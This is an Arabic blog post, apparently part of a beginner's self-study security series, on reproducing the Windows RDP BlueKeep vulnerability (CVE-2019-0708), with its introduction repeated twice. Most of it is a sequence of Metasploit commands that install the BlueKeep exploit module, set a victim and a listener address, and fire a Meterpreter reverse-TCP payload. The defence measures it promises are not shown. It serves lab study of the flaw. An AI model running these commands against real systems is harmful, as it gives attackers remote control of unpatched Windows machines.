
ستشارك هذه المقالة ثغرة خدمة سطح المكتب البعيد لويندوز (CVE-2019-0708)، وتشرح بالتفصيل هذه الثغرة وإجراءات الدفاع عنها. بصفة الكاتب مبتدئًا في مجال الأمن السيبراني، يشارك بعض الدروس الأساسية للتعلم الذاتي، وهي عبارة عن ملاحظات عبر الإنترنت حول أدوات الأمن والممارسات العملية، آملًا أن تنال إعجابكم. وفي الوقت نفسه، أتمنى أن تتمكنوا من العمل معي والتقدم، وسنواصل لاحقًا التعمق في معرفة الأمن السيبراني وأمن الأنظمة ومشاركة التجارب ذات الصلة. باختصار، آمل أن تكون هذه السلسلة من المقالات مفيدة للأصدقاء المدونين، فالكتابة ليست سهلة، فلا يزعجني الكبار بعدم الإعجاب، شكرًا لكم!
ستشارك هذه المقالة ثغرة خدمة سطح المكتب البعيد لنظام Windows (CVE-2019-0708)، وشرح مفصل للثغرة وتدابير الدفاع عنها. باعتبار المؤلف مبتدئاً في مجال الأمن السيبراني، يشارك بعض الدروس الأساسية للتعلم الذاتي للجميع، وهي ملاحظات عبر الإنترنت حول أدوات الأمان والممارسة العملية، أرجو أن تنال إعجابكم. في الوقت نفسه، أتمنى أن تتمكنوا من العمل معي والتقدم معاً، وسنتعمق لاحقاً في معرفة أمن الشبكات وأمن الأنظمة ونشارك التجارب ذات الصلة. باختصار، آمل أن تساعد هذه السلسلة من المقالات الأصدقاء، فكتابة المقالات ليست سهلة، فالكبار لا يحبون فلا تنتقدوا، شكراً!
المدونة المقابلة:
[سلسلة التعلم الذاتي لأمن الشبكات] 58. استغلال ثغرات Windows: نظرة ثانية على CVE-2019-0708 وصدفة Metasploit العكسية
[سلسلة التعلم الذاتي لأمن الشبكات] 44. إعادة إنتاج ثغرة خدمة سطح المكتب البعيد (CVE-2019-0708) وشرح تفصيلي
الأوامر الأساسية:
# نسخ الملفات
cp ./rdp/rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp ./rdp/rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
# تشغيل الأداة
msfconsole
reload_all
search 0708
# استخدام السكريبت
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
# عرض المعلومات
show options
show targets
info
# تعيين عنوان الاستماع وعنوان الهدف وحمولة العكس ونوع الهدف
set rhosts 192.168.44.132
set lhost 192.168.44.129
set rdp_client_ip 192.168.44.129
set payload windows/x64/meterpreter/reverse_tcp
unset RDP_CLIENT_NAME
set target 3
# تشغيل السكريبت
run
exploit
# تعيين عرض النطاق الترددي
Set GROOMSIZE 40
المراجع:
[1] https://github.com/rapid7/metasploit-framework/pull/12283?from=groupmessage&isappinstalled=0
[2] https://github.com/n1xbyte/CVE-2019-0708